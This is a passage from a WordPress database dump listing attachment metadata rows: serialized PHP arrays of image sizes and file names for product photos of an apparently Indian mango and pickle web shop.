"filesize\";i:2923;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"devgad-2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1255;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"devgad-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"devgad-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"devgad-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"devgad-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"devgad-2-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"devgad-2-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"devgad-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"devgad-2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"devgad-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"devgad-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"devgad-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5853,1153,'_wp_attached_file','2022/03/devgad-23.jpg'),(5854,1153,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2022/03/devgad-23.jpg\";s:8:\"filesize\";i:60629;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"devgad-23-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15895;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"devgad-23-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2850;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"devgad-23-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1202;}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"devgad-23-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"devgad-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"devgad-23-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"devgad-23-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"devgad-23-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"devgad-23-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"devgad-23-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5857,1154,'_wp_attached_file','2022/03/2.jpg'),(5858,1154,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:13:\"2022/03/2.jpg\";s:8:\"filesize\";i:43963;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:13:\"2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12492;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:13:\"2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2429;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:11:\"2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1143;}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:13:\"2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:11:\"2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:11:\"2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:11:\"2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5862,1155,'_wp_attached_file','2022/03/8.jpg'),(5863,1155,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:13:\"2022/03/8.jpg\";s:8:\"filesize\";i:35388;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:13:\"8-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9659;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:13:\"8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2103;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:11:\"8-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1048;}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:13:\"8-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:11:\"8-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:11:\"8-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:11:\"8-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5866,1156,'_wp_attached_file','2022/03/1643623622pk_540_sweet-mango-rajasthan_02.png'),(5867,1156,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:53:\"2022/03/1643623622pk_540_sweet-mango-rajasthan_02.png\";s:8:\"filesize\";i:99896;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104425;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13825;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"1643623622pk_540_sweet-mango-rajasthan_02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4212;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:51:\"1643623622pk_540_sweet-mango-rajasthan_02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"1643623622pk_540_sweet-mango-rajasthan_02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"1643623622pk_540_sweet-mango-rajasthan_02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"1643623622pk_540_sweet-mango-rajasthan_02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5892,1158,'_wp_attached_file','2022/03/1643623049pk_540_27oct21_mango_solapur_02.png'),(5893,1158,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:53:\"2022/03/1643623049pk_540_27oct21_mango_solapur_02.png\";s:8:\"filesize\";i:91729;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98520;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12813;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"1643623049pk_540_27oct21_mango_solapur_02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3881;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:51:\"1643623049pk_540_27oct21_mango_solapur_02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"1643623049pk_540_27oct21_mango_solapur_02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"1643623049pk_540_27oct21_mango_solapur_02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"1643623049pk_540_27oct21_mango_solapur_02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5918,1160,'_wp_attached_file','2022/03/1643623049mango_up_style.png'),(5919,1160,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:36:\"2022/03/1643623049mango_up_style.png\";s:8:\"filesize\";i:107056;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:36:\"1643623049mango_up_style-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117968;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:36:\"1643623049mango_up_style-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14433;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:34:\"1643623049mango_up_style-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4464;}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"1643623049mango_up_style-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"1643623049mango_up_style-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:36:\"1643623049mango_up_style-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"1643623049mango_up_style-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"1643623049mango_up_style-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:34:\"1643623049mango_up_style-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:34:\"1643623049mango_up_style-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5944,1162,'_wp_attached_file','2022/03/1643622711mango_hing_up_style.png'),(5945,1162,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2022/03/1643622711mango_hing_up_style.png\";s:8:\"filesize\";i:140200;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:141643;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16058;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"1643622711mango_hing_up_style-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4745;}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"1643622711mango_hing_up_style-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"1643622711mango_hing_up_style-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:39:\"1643622711mango_hing_up_style-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:39:\"1643622711mango_hing_up_style-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5970,1164,'_wp_attached_file','2022/03/chhunda_or_gujarati_sweet_mango.png'),(5971,1164,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:43:\"2022/03/chhunda_or_gujarati_sweet_mango.png\";s:8:\"filesize\";i:89054;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88791;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10864;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:41:\"chhunda_or_gujarati_sweet_mango-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3372;}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"chhunda_or_gujarati_sweet_mango-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"chhunda_or_gujarati_sweet_mango-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:41:\"chhunda_or_gujarati_sweet_mango-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:41:\"chhunda_or_gujarati_sweet_mango-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5996,1166,'_wp_attached_file','2022/03/mango_cut-removebg-preview.png'),(5997,1166,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:38:\"2022/03/mango_cut-removebg-preview.png\";s:8:\"filesize\";i:92904;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111855;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13962;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:36:\"mango_cut-removebg-preview-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4251;}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"mango_cut-removebg-preview-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"mango_cut-removebg-preview-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:3